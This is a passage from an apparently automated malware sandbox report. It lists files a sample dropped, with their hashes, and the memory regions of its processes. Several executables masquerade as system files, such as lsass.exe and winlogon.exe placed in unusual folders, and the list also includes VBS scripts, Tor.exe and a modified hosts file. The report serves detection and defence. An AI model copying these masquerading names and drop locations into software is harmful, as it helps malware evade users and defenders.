                19fc528bbada6d55a39b464c300a110e

                SHA1

                4016abebf8f049737e2091dd743c15ff3fa96a73

                SHA256

                fd5275c55a974d4078eb7de59aa72ce412ac8bcb6c8249b213fea1e0df329d0f

                SHA512

                41ae828bde4fe58fc970cf281b866f9bb4cf2ec1e2e835505ec65b041e134bd9adf9977fe85837a0921668c2cd8fe9fedd30b208c986b51e99c4864c33f02d03

              • C:\DriverHostCrtNet\comSvc.exe

                Filesize

                1.7MB

                MD5

                08278eef0c4511e2cbfce76266dd90f2

                SHA1

                9dd9dee2b7b3b19a6e8271ee443b79bb64eb288b

                SHA256

                f9313b93b7c392002e914e4e6af21eb8f5e25f86c37803c64e84ae8d228f2f03

                SHA512

                3e5fb401eafb8ddce42fd9bbbd23783941d7540e20edba98fe67e05871d72ac8c89e5a8a5254bc9db62cc74fae596b3c86785650e075e8a1d5b25651d90cadd0

              • C:\DriverHostCrtNet\unV39Cxd.bat

                Filesize

                32B

                MD5

                39e72d40a9ddaaf86994f941af3f7465

                SHA1

                e4b7c6d895cb2ce60391ab1a4363425868b63204

                SHA256

                4482b48de5d1a8c39b59f5293ddc7bbcba2af31ff77ebc02e48b68c6a68b0fae

                SHA512

                beb0761aaca17016bd7def46956b006f201885f24b1ecce29e75b65199f9196a3cb2461b79734e49f8a2328647f3ae2e741b8afb52d7857d429b0a7b0ef0f4a1

              • C:\Program Files (x86)\Google\Temp\winlogon.exe

                Filesize

                1.7MB

                MD5

                140ab2669f87f619d65359606c22f762

                SHA1

                021da66ad7962c4ac2ff0a05f0f424d1488a6efe

                SHA256

                230b332f94351c501872b63e997a5f3a458e6f914835e85bfbf92ee7b1caad8b

                SHA512

                4bd5602f850c4b33729a4789fa4540d601e76d9608da0fed16fa6b2573981ea87342f93f2c57aa145ecd63ccfe912c960eb245eb34833f3809892ac07c94857b

              • C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp

                Filesize

                1.7MB

                MD5

                db580349ff4238ccf1b33aac144c28ed

                SHA1

                2c97445c6c90307879e606da60a9bdcfac9d0a1f

                SHA256

                fd94d60527fc981979b222e23e368131e5e1d21cbb53fd71aa67684a308eb46f

                SHA512

                e8f1fe0dc62c7061ea2fd8f152a6347b882185a738e31883eb75fe140230b7f64bd9d51ed9af8df2850077c540579430b761f9b00f7645fc4364d9c09127b711

              • C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp

                Filesize

                1.7MB

                MD5

                dbfa087e264beffa3a0247b3a5989aa5

                SHA1

                f1fc7b83a480cc49d17d7a91f92e2bef54ae4048

                SHA256

                5d59ce562d799c6e0ce33d30ad5095c7432cd71ce66f4594377e28ae3a031533

                SHA512

                198b3cab56b8c38d4bac0b4fcb7e995e7a4eaf64432a35f268a6d135ffe91d3dd2fcd3c1f0b7d38b993dc5aacc0c07d70c21a46d7dfcd4ecc1b96bcfba80dda2

              • C:\Program Files\Windows Multimedia Platform\lsass.exe

                Filesize

                1.7MB

                MD5

                e3c6c535f8752fd171107b16aeea7e17

                SHA1

                32acd7d8666b85ae37f3d0e49a68bead46f5e81c

                SHA256

                a1ee8260f0ddb99fd706b31df2d201373b0e938c292eb8b02c56ada04d3d14fd

                SHA512

                5516a4ae426ac4fa1654e83bf2255c7d94061aec51ca89c479796777d3633cf93536072e6c028afe1e9dc8e0aa6f447b3bee4d602835d2216b988e016e66e717

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                Filesize

                1KB

                MD5

                3ad9a5252966a3ab5b1b3222424717be

                SHA1

                5397522c86c74ddbfb2585b9613c794f4b4c3410

                SHA256

                27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249

                SHA512

                b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                223bd4ae02766ddc32e6145fd1a29301

                SHA1

                900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

                SHA256

                1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

                SHA512

                648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                5b9a7ee9a9286faef39bbe9cac042fd4

                SHA1

                cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3

                SHA256

                a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348

                SHA512

                ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                cadef9abd087803c630df65264a6c81c

                SHA1

                babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                SHA256

                cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                SHA512

                7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                2e907f77659a6601fcc408274894da2e

                SHA1

                9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                SHA256

                385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                SHA512

                34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                bd5940f08d0be56e65e5f2aaf47c538e

                SHA1

                d7e31b87866e5e383ab5499da64aba50f03e8443

                SHA256

                2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                SHA512

                c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                e8ce785f8ccc6d202d56fefc59764945

                SHA1

                ca032c62ddc5e0f26d84eff9895eb87f14e15960

                SHA256

                d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

                SHA512

                66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                e243a38635ff9a06c87c2a61a2200656

                SHA1

                ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                SHA256

                af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                SHA512

                4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                e1d7973fb9071815b4241da5ec0dfb6a

                SHA1

                41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9

                SHA256

                b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b

                SHA512

                66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                4cb59d549e8c5d613ea4b7524088528a

                SHA1

                5bdfb9bc4920177a9e5d4b9c93df65383353ab22

                SHA256

                a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a

                SHA512

                a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52

              • C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs

                Filesize

                482B

                MD5

                68a095c7021a6ccc4d3a17d93f9e86bd

                SHA1

                0f6ea77ee95e3bba5a67a266d2f2e2a6df9bc3ce

                SHA256

                4744ed0a3de93248e8a4c3ce9e8f133387a8ccf437c5b57bb18dd99723f1b4f5

                SHA512

                b33abc8b188040b6c89c3f2310a20d0980cf08bbf2c5a479a82af39cf52119525d3fbcba2ca7ea2193bff35655f2cfdf5211fa6cd79624912876ed918e186f28

              • C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs

                Filesize

                706B

                MD5

                d5fd9d27d73330bf57ded1888870d647

                SHA1

                8a97cd2488b3e6a3c630fd38de221f3a399d36b4

                SHA256

                8b2b064865036539bbcc1f94caaa6f9eb94b81cc9589e06b55cd19ae8c4e00df

                SHA512

                dfaa890f12484ebc19e4956bf7d0eff449f42da756392095721307288c24b438655b81ee6cc5d7f9cccf5ed1958e9d59ba5c56bd490fb380b300be3516b1ef86

              • C:\Users\Admin\AppData\Local\Temp\Tor.exe

                Filesize

                2.0MB

                MD5

                e235a410c3e0c9432f755940e7d5ac61

                SHA1

                b94f875771c83acbcdcd3c788dc8002eaf91438f

                SHA256

                a77e85defe720361ffa22bc96fe3c82366c3ef61dd931bdf0e0326aa984a33b3

                SHA512

                6d3c3650441b48e37ca1352d9f38a66a6376741439db8efc9f765de5df7506400e5ea5174d28734e2876889f242bc9ab7e8e5013c18575b5ccb7493bd8e2b33f

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoxjkbk4.f15.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\ft.exe

                Filesize

                4.0MB

                MD5

                e84cc0620cc96970d2e1a8d0017000a6

                SHA1

                3e06e2f55642880f6b3738f462a60bc4d84f68ba

                SHA256

                17df34146d3c1442f4b303e9536dd207424eb4d07d90a54f8b4cef20f40d43a8

                SHA512

                d902fa5eed92eafc6f11f2a5d3e49020948e6c152d5c34a09c6d42b47ec2319da4ee5f63f38dd658da3f846e9495ad93ae3f9cfa834d827a59e9bc3ce5bd10f0

              • C:\Windows\System32\drivers\etc\hosts

                Filesize

                3KB

                MD5

                7a47afdf68d97d678987c9d60eab9086

                SHA1

                1e03088721b6c7d0aab59e80f12238837793f051

                SHA256

                860d78899a84ae7c858183ff0eab215ee0f36febfdfd766a2fb6d429895da669

                SHA512

                9dc0cbcefc921689582ed163c767c7c0b681236d499cf962ade0415a2b0fcd7d501e682a0ea3c385f7d039d3de94bb0b40c001851b1dd4c0d05c7fb26b65881c

              • memory/1664-41-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/1664-15-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/1664-12-0x0000022EE1350000-0x0000022EE1372000-memory.dmp

                Filesize

                136KB

              • memory/1664-13-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/1664-14-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/3320-451-0x000000001B170000-0x000000001B182000-memory.dmp

                Filesize

                72KB

              • memory/3320-450-0x0000000000440000-0x00000000005F6000-memory.dmp

                Filesize

                1.7MB

              • memory/4304-1-0x0000000000B80000-0x0000000000BAE000-memory.dmp

                Filesize

                184KB

              • memory/4304-0-0x00007FF8334D3000-0x00007FF8334D5000-memory.dmp

                Filesize

                8KB

              • memory/4404-73-0x0000000002540000-0x0000000002550000-memory.dmp

                Filesize

                64KB

              • memory/4404-78-0x000000001AF80000-0x000000001AF8C000-memory.dmp

                Filesize

                48KB

              • memory/4404-83-0x000000001B820000-0x000000001B82C000-memory.dmp

                Filesize

                48KB

              • memory/4404-84-0x000000001B830000-0x000000001B83A000-memory.dmp

                Filesize

                40KB

              • memory/4404-85-0x000000001B840000-0x000000001B848000-memory.dmp

                Filesize

                32KB

              • memory/4404-87-0x000000001B960000-0x000000001B96C000-memory.dmp

                Filesize

                48KB

              • memory/4404-86-0x000000001B950000-0x000000001B95C000-memory.dmp

                Filesize

                48KB

              • memory/4404-79-0x000000001B700000-0x000000001B708000-memory.dmp

                Filesize

                32KB

              • memory/4404-82-0x000000001B710000-0x000000001B71C000-memory.dmp

                Filesize

                48KB

              • memory/4404-67-0x0000000000150000-0x0000000000306000-memory.dmp

                Filesize

                1.7MB

              • memory/4404-77-0x000000001AF90000-0x000000001AFA0000-memory.dmp

                Filesize

                64KB

              • memory/4404-72-0x0000000002420000-0x0000000002428000-memory.dmp

                Filesize

                32KB

              • memory/4404-75-0x000000001AF70000-0x000000001AF82000-memory.dmp

                Filesize

                72KB

              • memory/4404-74-0x000000001AF50000-0x000000001AF66000-memory.dmp

                Filesize

                88KB

              • memory/4404-70-0x000000001AFA0000-0x000000001AFF0000-memory.dmp

                Filesize

                320KB

              • memory/4404-69-0x000000001AF30000-0x000000001AF4C000-memory.dmp

                Filesize

                112KB

              • memory/4876-115-0x00007FF61D540000-0x00007FF61D944000-memory.dmp

                Filesize

                4.0MB

              • memory/5280-487-0x0000000001970000-0x0000000001982000-memory.dmp

                Filesize

                72KB